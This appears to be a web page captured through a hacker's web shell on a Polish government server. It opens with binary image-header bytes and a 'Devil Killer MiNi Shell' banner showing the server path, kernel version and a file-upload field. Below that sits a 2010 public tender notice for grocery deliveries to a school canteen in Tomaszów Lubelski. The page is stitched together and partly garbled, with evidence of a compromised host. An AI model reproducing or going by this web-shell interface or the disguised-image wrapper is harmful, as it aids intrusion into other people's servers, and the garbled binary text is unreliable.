JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100811/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100811/245964-N-2010.html

<p class="kh_header"><b>Tomaszów Lubelski: SUKCESYWNA DOSTAWA ARTYKUŁÓW SPOŻYWCZYCH DLA ZESPOŁU SZKÓŁ NR 4 W TOMASZOWIE LUBELSKIM, UL ŻWIRKI I WIGURY 7.</b><br>
<b>Numer ogłoszenia: 245964 - 2010; data zamieszczenia: 11.08.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół im.Jarosława Dąbrowskiego w Tomaszowie Lub. , ul. Żwirki i Wigury 7, 22-600 Tomaszów Lubelski, woj. lubelskie, tel. 084 6659015, faks 084 6659002.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> zs4.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> SUKCESYWNA DOSTAWA ARTYKUŁÓW SPOŻYWCZYCH DLA ZESPOŁU SZKÓŁ NR 4 W TOMASZOWIE LUBELSKIM, UL ŻWIRKI I WIGURY 7..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Sukcesywna dostawa artykułów spożywczych dla stołówki szkolnej przy internacie Zespołu Szkół Nr 4 w Tomaszowie Lubelskim przy ul. Żwirki i Wigury 7 Przedmiot zamówienia został podzielony na 13 części  od nr 1 do nr 13. CZĘŚĆ   1 - Pieczywo 
( CPV) :  15612500-6, CZĘŚĆ 2 - Mleko i jego przetwory,  kod CPV 15500000-3,  CZĘŚĆ 3 -  Mieso jadalne, surowce rzeżne i wyroby wedliniarskie,  Kod CPV 15100000-9, 15131120-2 , CZĘŚĆ 4 -Rózne artykuły spozywcze,  Kod CPV CPV-15800000-6,  CZĘŚĆ 5 - Ryby przetworzoone i konserwowe, Kod CPV-15200000-0,  CZĘŚĆ 6 - Drób, CPV 15112000- 6,  CZĘŚĆ 7 - Mrozonki,  Kod CPV 15331100-8,  CZĘŚĆ 8 -Produkty mączne gotowe,  Kod CPV 15851000-8, CZĘŚĆ 9 - Warzywa i owoce świeże, Kod CPV 03121000-5, CPV- 15300000-1, CZĘŚĆ 10 - Makarony ( CPV) 15850000-1, CZĘŚĆ 11- Jaja kurze, CPV 03142500-, CZĘŚĆ 12 - Ziemniaki, CPV 03212100-1,CZĘŚĆ 13- Przyprawy i zupy,  CPV-15800000-6,   Szczegółowy opis przedmiotu zamówienia zawierają poszczególne części, które stanowią arkusze kalkulacyjne ofert jako załączniki niniejszej specyfikacji nr:  2.1, 2.2, 2.3., 2.4, 2.5, 2.6, 2.7, 2.8, 2.9, 2.10, 2.11,  2.12, 2.13..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.61.25.00-6, 15.50.00.00-3, 15.10.00.00-9, 15.13.11.20-2, 15.80.00.00-6, 15.20.00.00-0, 15.11.20.00-6, 15.33.11.00-8, 15.85.10.00-8, 15.30.00.00-1, 03.12.10.00-5, 15.85.00.00-1, 03.14.25.00-3, 03.21.21.21-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 13.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Sprawdzenie warunków udziału w postępowaniu odbywać się będzie na postawie przedłożonych przez wykonawcę dokumentów i oświadczeń na zasadzie spełnia /nie spełnia/. Niespełnienie jednego warunku, skutkować będzie wykluczeniem wykonawcy z postępowania. Z treści złożonych dokumentów musi jednoznacznie wynikać , iż wyżej wymienione warunki zostały spełnione przez wykonawcę.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.powiat-tomaszowski.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Szkół Nr 4 w Tomaszowie Lubelskim, ul. Żwirki i Wigury 7.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.08.2010 godzina 11:00, miejsce: Zespół Szkół Nr 4 w Tomaszowie Lubelskim, ul. Żwirki i Wigury 7, 22-600 Tomaszów Lubelski, sekretariat szkoły /parter/.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pieczywo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Chleb  zwykły  krojony    500 g	4200 szt
Chleb razowy 500 g	  350 szt
Bułka 100 g.	 6 500 szt 
Bułka tarta 	150 kg
Placek Cebularz  100 g	    550 szt
Drożdzówka  100 g 	550 szt 
Pierożki z kaszą lub kapusta porcja nie mniej niż 120g        	50 porcji
Pączki 	200 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.61.25.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> MLEKO I JEGO PRZETWORY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Mleko spożywcze 2%  tł.  W opak. 1 l.	1 500 l
Śmietana 18 % tł.   L	               500 l
Masło ex .zawartość tł. 82,5%  	250 kg
Twaróg  półtłusty 	160 kg
Ser  żółty minimum 
45 % tłuszczu	40 kg.
Jogurty  kubek  150 ml. 	250 szt
Serek homogenizowany	200 szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> MIĘSO JADALNE I SUROWCE RZEŹNE I WYROBY WĘDLINIARSKIE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Mięso mielone wieprz-wołowe	350 kg
Łopatka wieprzowa b/ kośći	130 kg
Karkówka wieprzowa b.kości	210 kg
Schab  wieprzowy b/kości 	220 kg
Wątroba wieprzowa	50 kg
Żeberka  wieprzowe	220 kg
Słonina 	60 kg
Smalec 	200 kg
Kości wieprzowe	600 kg
Boczek wędzony parzony	100 kg
Baleron	50 kg
Kiełbasa grilowa	100 kg
Kiełbasa szynkowa	50 kg
Kiełbasa zwyczajna	50 kg
Kiełbasa krakowska	70 kg
Kiełbasa łopatkowa	10 kg
Kiełbasa golonkowa	20 kg
Mortadela	25 kg
Mielonka wieprzowa-prasow.	40 kg
Łopatka prasowana	35 kg
Paróweczki wieprzowe	100 kg
Pasztet zapiekany	30 kg
Pieczeń rzymska 	110 kg
Szynka wieprzowa	20 kg
Szynka	10 kg
Pasztetowa	25 kg
Ogonówka	40 kg
Filet z indyka /pieczony/	50 kg.
Kaszanka 	20 kg
Flaki wieprzowe krojone	50 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.11.20-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> RÓŻNE PRODUKTY SPOŻYWCZE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Cukier biały kryształ   (1kg)	600 	kg				
Cukier waniliowy (16-20)g	70	szt				
Chrzan tarty w słoiku op.  200 g 	110	szt			
Kakao ciemne sypkie /Dekomorena/ lub inny  równoważny 100 g	7	
Dżem wiśniowy  nie mniej jak 320 g	20	szt			
Dżem  truskawkowy nie mniej niż 320 g	100	szt		
Marmolada  wieloowocowa 900 g.	30	kg			
Powidła śliwk. nie mniej niż 320 g	40	szt			
Groszek konserwowy  op.nie mniej jak 400 g  	100 	szt		
Herbata granulowana 100 g 
/firmy Saga  lub inna równoważna/	200	szt			
Ogórek konserwowy  gat.I. poj.0.9 l	400	szt			
Papyka konserwowa poj.  0,9 l	50	szt			
Serek top. Krążki  op. 200 g	140	szt				
Serek top. plastry op.180g	270	szt				
Szyneczka  wieprzowa nie mniej jak  op. 110g	300	szt		
Szyneczka drobiowa  nie mniej jak 
 op. 110 g	200	szt				
Sól czosnkowa torebka 7 g.	150	szt				
Sól kuchenna	130	kg				
Ziele angielskie torebka 15 g.	35	szt			
Liście laurowe torebka 15 g.	60	szt				
Mąka pszenna luksusowa typ 550 	140	kg			
Mąka ziemniaczana op 500 g.	10	kg.			
Olej jadalny uniwersalny op. 1l.
110	szt				
Margaryna stołowa zwykła kostka op. 250g	140	szt		
Kasza gryczana op. 1000 kg
65	kg				
Kasza jęczmienna wiejska średnia grubość op. 1000 g. 	90	kg	
Płatki kukurydziane /typu Nestle lub inne  równoważne/ op. 425g	40	
Pasztet drobiowy nie mniej jak op 135 g.	320	szt		
Kisiel torebka 7 g.	20	szt				
Ananasy 450 g30	szt.				
Miód naturalny wielokwiatowy op. słoik 1300 g.	6	szt		
Ketchup pikantny/firmy Roleski lub równoważny/ op 0.5 l	180	szt	
Musztarda stołowa opakowanie nie mniej niż 180 g.	250	szt	
Kwasek cytrynowy 7 g.	45	szt				
Ryż biały op. 1kg	160	kg				
Koncentrat pomidorowy 30 % 
op. 900 ml 	65	szt				
Kawa inka 100 g.	50	szt				
Pomysł na op. op nie mniej jak 200 g	45	szt			
Ziarenka smaku torebka 450 g.	90	szt			
Ziarenka smaku torebka 220 g.	15	szt		
Kukurydza konserwowa  słodka  -op.nie mniejsze jak 400 g		
Majonez dekoracyjny nie mniej niż 700 g. firmy Winiary lub równoważny 35 st		
Majeranek torebka 7 g.	20	szt				
Kminek torebka 7 g.	10	szt				
Pieprz naturalny torebka 7 g.	125	szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> RYBY PRZETWORZONE I KONSERWOWANE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Filet z ryby  pangi mrozony
	45kg.
Filet z ryby mrozony  

morszczuk SHP,	35kg.
Filety śledziowe b/skóry w oleju  op. 4kg                   	15kg.
Makrela wędzona 	30  kg.
Paprykarz szczeciński ALUPAK op.  Nie mniej jak 135 g	20 szt.
Sałatka rybna z makreli ALUPAK nie mniej jak 135 g.	20 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.20.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> DRÓB.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Filet drobiowy  z indyka /świeży/	50 kg
Ćwiartka kurczaka św.	350 kg
Filet drobiowy   z kurczaka  /świeży/	200 kg
Korpusy	  50 kg..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.20.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> MROŻONKI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Mieszanka warzywna 6 skł. 	80 kg
Marchewka	200kg
Kalafior mrożony	60 kg
Fasolka szparagowa zielona 	20 kg
Pyzy ziemniaczane  mrożone 	200 kg.
Pyzy ziemniaczane z mięsem 	200 kg
Mieszanka owocowa kompotowa	100 kg
Truskawki mrożone	20 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.11.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Produkty mączmne gotowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pierogi ruskie  domowe /świeże/	
170 kg
Pierogi z kapustą 	40 kg
Uszka z grzybami	10 kg
Krokiety	10 kg
Pierogi z kapustą i z pieczarkami	15 kg
Kluskie śląskie	100 kg.
Kluski leniwe	100 kg..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.85.10.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Warzywa i owoce świeże.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Marchewka	250 kg.
Pietruszka	80 kg.
Seler korzeń	80 kg.
Por	90 kg.
Cebula	420 kg.
Kapusta kwasz.	350 kg.
Kapusta biała	50 kg.
Burak ćwikła	500 kg.
Kapusta pekińska	160 kg.
Kapusta czerwona	100 kg.
Pieczarki	80 kg.
Groch średniej grubości	100 kg.
Jabłka	300 kg..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Makaron.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Makaron nitki paczkowany po  0,50kg do 1 kg.	kg.	150
Makaron gruby ( różne kształty ) paczkowany po 0,5 kg do 1 kg.	kg	400
Makaron spaghetti  paczkowany po 0,5 kg do 1 kg	kg	100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.85.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Jaja jurze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jaja kl A  ( 53-63g)	szt.	6 000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.13.25.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Ziemniaki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ziemniaki jadalne późne op.
 30 kg. Polska Norma - 
PN-75-R-744 530	Kg.	10 000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.21.21.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Przyprawy i zupy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zupa pieczarkowa op.3 kg.	5	szt
Żurek 3kg	5	szt
Barszcz biały 3 kg.	5	szt
Barszcz czerwony 3 kg	2	szt
Przyprawa w płynie 5 l.	5	op
Delikat do drobiu 0,6 kg.	5	szt
Delikat do mięsa 0,7 kg.	5	szt
Delikat  do ryb 0,6 kg.	5	szt
Sos ogrodowo-sałatkowy 0,7 kg.	15	szt
Sos pieczeń 1,2 kg.	5	szt
Sos napoili 1 kg.	10	szt
Sos bolongh. 1.1 kg.	5	szt
Sos do gulaszu Fix 1.1 kg.	10	szt
Sos grzybowy 1.1 kg.	5	szt
Rosół z kury 1 kg.	5	szt
Rosół wołowy 0,9 kg.	5	szt
Przyprawa szefa 2kg	20	szt
Sos słodko-kwaśny 1.5 kg.	5	szt
Sos węgierski 1,2 kg.	5	szt..</p></li>
